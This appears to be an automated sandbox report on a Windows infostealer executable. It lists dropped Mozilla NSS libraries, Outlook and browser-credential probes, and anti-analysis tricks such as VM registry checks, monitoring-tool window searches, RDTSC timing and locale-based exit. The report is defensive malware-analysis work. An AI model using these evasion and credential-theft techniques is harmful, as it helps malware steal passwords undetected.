Source: IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1899651211.0000000029509000.00000004.00000020.00020000.00000000.sdmp, IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1899651211.0000000029509000.00000004.00000020.00020000.00000000.sdmp, IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096	0_2_004B4096
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C68BC	0_2_004C68BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B9167	0_2_004B9167
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00581932	0_2_00581932
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BE1C9	0_2_004BE1C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0052BA6E	0_2_0052BA6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036CB75	0_2_0036CB75
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C3307	0_2_004C3307
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B5BC3	0_2_004B5BC3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BABF4	0_2_004BABF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BFC81	0_2_004BFC81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0038CD06	0_2_0038CD06
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A2DC6	0_2_004A2DC6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C4E05	0_2_004C4E05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A469E	0_2_004A469E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B2696	0_2_004B2696
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C1765	0_2_004C1765
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F7A1	0_2_0040F7A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BC7B7	0_2_004BC7B7

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 000F45C0 appears 316 times

Source: file.exe, 00000000.00000002.1966711782.000000006C825000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1966857854.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: jshjaqtz ZLIB complexity 0.994920316814974

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00109600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00109600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00103720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00103720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3ARW62QE.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1800610371.000000001D228000.00000004.00000020.00020000.00000000.sdmp, CAFHDBGHJKFIDHJJJEBK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1966330928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 42%

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1824768 > 1048576

Source: file.exe

Static PE information: Raw size of jshjaqtz is bigger than: 0x100000 < 0x197600

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1966811807.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1966611554.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1966811807.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;jshjaqtz:EW;lngegkpx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;jshjaqtz:EW;lngegkpx:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00109860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00109860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c1b67 should be: 0x1ccf64

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: jshjaqtz
Source: file.exe	Static PE information: section name: lngegkpx
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D1852 push esi; mov dword ptr [esp], ebx	0_2_005D1890
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00539845 push 1EAC8B7Ch; mov dword ptr [esp], esi	0_2_005398B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0010B035 push ecx; ret	0_2_0010B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054C071 push ebp; mov dword ptr [esp], esi	0_2_0054C0B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054C071 push 05F8D5FBh; mov dword ptr [esp], edx	0_2_0054C0D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005A50FB push eax; mov dword ptr [esp], esp	0_2_005A59FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00556890 push ebx; mov dword ptr [esp], esp	0_2_0055691F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00556890 push ecx; mov dword ptr [esp], eax	0_2_00556955
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 4DB869A8h; mov dword ptr [esp], ecx	0_2_004B409F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 3FEEB300h; mov dword ptr [esp], ebp	0_2_004B412D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 7E29CA36h; mov dword ptr [esp], edx	0_2_004B413B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push edi; mov dword ptr [esp], ebx	0_2_004B41C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push ecx; mov dword ptr [esp], esi	0_2_004B41F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 4816F023h; mov dword ptr [esp], esi	0_2_004B428D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push ebx; mov dword ptr [esp], edi	0_2_004B432F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push eax; mov dword ptr [esp], 57BFBBB7h	0_2_004B4333
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push ecx; mov dword ptr [esp], esi	0_2_004B4408
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 6A2D2E91h; mov dword ptr [esp], edx	0_2_004B4472
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 152B9226h; mov dword ptr [esp], ecx	0_2_004B449A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push ebp; mov dword ptr [esp], edx	0_2_004B44DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push edx; mov dword ptr [esp], ebx	0_2_004B4501
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 38DC080Ch; mov dword ptr [esp], esp	0_2_004B454F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push ebx; mov dword ptr [esp], 7FFB0FD1h	0_2_004B45C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 5823CB40h; mov dword ptr [esp], eax	0_2_004B461A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push esi; mov dword ptr [esp], edi	0_2_004B4685
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push eax; mov dword ptr [esp], 5BDBD3BCh	0_2_004B47B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push edi; mov dword ptr [esp], ecx	0_2_004B47E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push esi; mov dword ptr [esp], 1459C6DCh	0_2_004B481A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push 4AF72872h; mov dword ptr [esp], ebp	0_2_004B486C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push ecx; mov dword ptr [esp], 6FFF0BF6h	0_2_004B4905
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B4096 push esi; mov dword ptr [esp], ecx	0_2_004B499A

Source: file.exe

Static PE information: section name: jshjaqtz entropy: 7.952953336791205

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00109860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13247

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3516E8 second address: 3516EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3516EC second address: 3516F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB68E second address: 4CB692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB692 second address: 4CB698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB698 second address: 4CB6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B7530A292h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F3B7530A295h 0x00000012 pushad 0x00000013 jl 00007F3B7530A286h 0x00000019 pushad 0x0000001a popad 0x0000001b jng 00007F3B7530A286h 0x00000021 popad 0x00000022 push esi 0x00000023 jns 00007F3B7530A286h 0x00000029 pop esi 0x0000002a pushad 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d push esi 0x0000002e pop esi 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CBB53 second address: 4CBB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B74DE4450h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE957 second address: 4CE96D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B7530A291h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CED1E second address: 4CED6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b jne 00007F3B74DE4446h 0x00000011 jmp 00007F3B74DE4452h 0x00000016 popad 0x00000017 pop ecx 0x00000018 nop 0x00000019 mov dword ptr [ebp+122D315Fh], eax 0x0000001f push 00000000h 0x00000021 call 00007F3B74DE4449h 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 jmp 00007F3B74DE4451h 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CED6A second address: 4CED93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B7530A28Dh 0x00000008 jmp 00007F3B7530A28Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jne 00007F3B7530A286h 0x0000001a pop edi 0x0000001b rdtsc
